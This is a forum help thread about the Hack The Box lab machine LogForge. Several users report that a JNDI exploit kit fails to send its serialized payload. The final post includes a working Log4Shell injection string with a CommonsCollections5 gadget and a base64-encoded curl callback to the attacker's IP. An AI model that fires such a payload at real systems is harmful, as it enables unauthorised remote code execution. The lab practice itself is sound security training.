LogForge Help

I’ve been going through some retired HTB boxes and was trying to do LogForge using HTB’s PwnBox. I get up to the point where I’m using the ****-Exploit-Kit and I have the payload ready to go. However, when using the exploit, tcpdump will say it connects correctly to the **AP server and then redirects to port 8081 for a subsequent payload, but that last redirection doesn’t happen at all. ****-Exploit-Kit doesn’t send the payload. I’m not sure if anyone else has had any luck using PwnBox for this machine. I also tried using a personal Parrot VM but hit the same problem. I’m following a walkthrough/write-up and the exploit kit should be sending the payload right after it says “redirecting to XYZ”.

I don’t have the walk-through to reference… from my notes, if I am looking at the right part anyway, it looks like I used the kit to generate the payload (assuming you’re talking about the JNDI exploit kit?) and then either used Burp or Tomcat to actually send the payload. Hopefully that makes sense/helps. Also, if you didn’t already, I would highly recommend watching ippsec’s video on YouTube of the box.

I tried to use Burp to send the payload and I also tried doing it directly via the web GUI. I have watched Ippsec’s video and I was hoping to follow it because his stuff is really good and detailed. I wasn’t able to get the same results as him though. Maybe I’ll try again another time.

Same issue here. I can’t replicate the walkthroughs… :frowning:

I followed ippsec’s video walkthrough and, just like @_dials, it says “redirecting to port 8081…” instead of displaying the serialized payload like in ippsec’s video.

I was able to get it to display the serialized payload by utilizing the dynamic generation functionality of the ****-Exploit-Kit, like this:

${jndi:ldap://10.10.14.3:1389/serial/CommonsCollections5/exec_unix/Y3VybCAxMC4xMC4xNC4zOjkwMDIK}

However, it doesn’t look like it ever executes the payload server-side (I didn’t see any ICMP packets come back in tcpdump).